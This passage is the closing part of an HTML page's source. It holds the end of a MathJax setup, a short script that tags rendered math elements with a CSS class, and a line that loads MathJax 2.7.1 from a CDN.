          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

</body>
</html>
